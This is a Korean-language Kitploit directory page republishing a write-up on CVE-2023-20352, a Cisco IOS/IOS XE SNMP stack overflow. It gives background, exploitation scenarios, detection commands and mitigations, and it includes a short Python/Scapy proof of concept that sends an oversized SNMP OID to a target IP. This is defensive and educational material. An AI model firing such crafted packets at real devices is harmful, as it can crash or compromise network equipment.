Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352는 Cisco IOS/IOS XE의 SNMP 엔진에서 발생하는 치명적인 스택 오버플로 취약점입니다. 제작된 SNMP 패킷만으로 원격 공격자가 시스템을 충돌시키거나 루트 제어권을 장악할 수 있습니다. 모든 SNMP 버전이 취약하므로 지금 패치하지 않으면 전체 시스템이 침해될 위험이 있습니다. | Kitploit
도구/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & Education
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

CVE-2023-20352는 Cisco IOS/IOS XE의 SNMP 엔진에서 발생하는 치명적인 스택 오버플로 취약점입니다. 제작된 SNMP 패킷만으로 원격 공격자가 시스템을 충돌시키거나 루트 제어권을 장악할 수 있습니다. 모든 SNMP 버전이 취약하므로 지금 패치하지 않으면 전체 시스템이 침해될 위험이 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
10개월 전아직 검토되지 않음

SNMPocalypse-Cisco-버그-해커가-장치를-충돌시키거나-제어할-수-있게-하다

CVE-2023-20352는 Cisco IOS/IOS XE의 SNMP 엔진에 존재하는 심각한 스택 오버플로 결함입니다. 조작된 SNMP 패킷만으로 원격 공격자는 시스템을 충돌시키거나 루트 제어권을 장악할 수 있습니다. 모든 SNMP 버전이 취약합니다. 지금 패치하지 않으면 완전한 침해 위험이 있습니다.

작성자: Mark Malllia

SNMP 소개

SNMP(Simple Network Management Protocol)는 네트워크 관리의 기반 프로토콜로, 시스템 관리자가 네트워크 장치를 모니터링, 구성 및 관리할 수 있게 해줍니다. 포트 161(SNMP 요청용)과 162(트랩용)에서 작동합니다. SNMP는 v1, v2c, v3의 세 가지 버전을 지원하며, 각각 다른 수준의 보안을 제공합니다. 이번 건은 저와 특히 밀접한 관련이 있습니다. 제 논문이 SNMP에 초점을 맞췄고, Cisco는 제 일상 업무에서 여전히 핵심이기 때문입니다.

SNMP의 유용성은 네트워크 전반의 실시간 모니터링, 인벤토리 관리, 장애 감지에까지 확장됩니다. 중요성에도 불구하고, SNMP가 네트워크 관리에서 차지하는 역할은 제대로 보안 설정되지 않았을 때 보안 위험을 초래하기도 하며, 이는 CVE-2023-20352 취약점에서 확인할 수 있습니다.

무엇이 잘못되었는가: CVE-2023-20352 설명

CVE-2023-20352는 Cisco IOS 및 IOS XE 장치에 영향을 미치는 높은 심각도의 스택 기반 버퍼 오버플로 결함입니다. 이 결함은 네트워크 관리 트래픽을 처리하는 SNMP 하위 시스템에 존재합니다.

기술 세부 사항:

  • 취약점 유형: 스택 기반 버퍼 오버플로(CWE-121)
  • CVSS 점수: 7.7(높음)
  • 영향: 잠재적 서비스 거부(DoS) 또는 원격 코드 실행(RCE)

이 취약점은 취약한 장치로 전송된 조작된 SNMP 패킷에 의해 트리거되며, 부적절한 경계 검사로 인해 스택 오버플로가 발생합니다. 모든 SNMP 버전이 영향을 받습니다.

악용 시나리오

  1. 낮은 권한 공격:

    • 필요한 접근 권한: SNMPv2c 읽기 전용 문자열 또는 SNMPv3 자격 증명.
    • 영향: 장치 재시작(DoS).
  2. 높은 권한 공격:

    • 필요한 접근 권한: 권한 수준 15 자격 증명이 포함된 SNMPv1/v2c 문자열.
    • 영향: 루트 권한으로 완전한 RCE.

탐지 및 검증

관리자는 다음 CLI 명령을 사용하여 취약점을 탐지할 수 있습니다:

root@kitploit:~
show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp

보안 강화: 완화 조치

  • 패치 적용: Cisco는 영향을 받는 플랫폼용 펌웨어 패치를 출시했습니다.
  • SNMP 접근 제한: 아직 수행하지 않았다면 신뢰할 수 있는 IP로만 접근을 제한하세요.
  • 취약한 OID 비활성화: snmp-server view <view-name> <OID> excluded와 같은 명령을 사용하세요.

공격자가 이를 악용하는 방법

Python과 Scapy를 사용한 개념 증명(PoC)은 악용 가능성을 보여줍니다:

root@kitploit:~
from scapy.all import *

# Replace with target IP and SNMP community string
target_ip = "192.168.1.1"
community = "public"

# Craft malicious packet
payload = b"A" * 1024  # Overflow buffer
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))

send(packet)

참고: 이것은 단순화된 예시입니다. 실제 악용에는 정밀한 페이로드 제작과 권한 상승이 필요합니다.

결론

CVE-2023-20352 취약점은 SNMP의 핵심적인 역할과 관련 위험을 강조합니다. 조직은 위협을 완화하고 새로운 공격에 대한 네트워크 복원력을 보장하기 위해 SNMP 구성의 패치 적용과 보안 설정을 최우선으로 해야 합니다.

도구 다운로드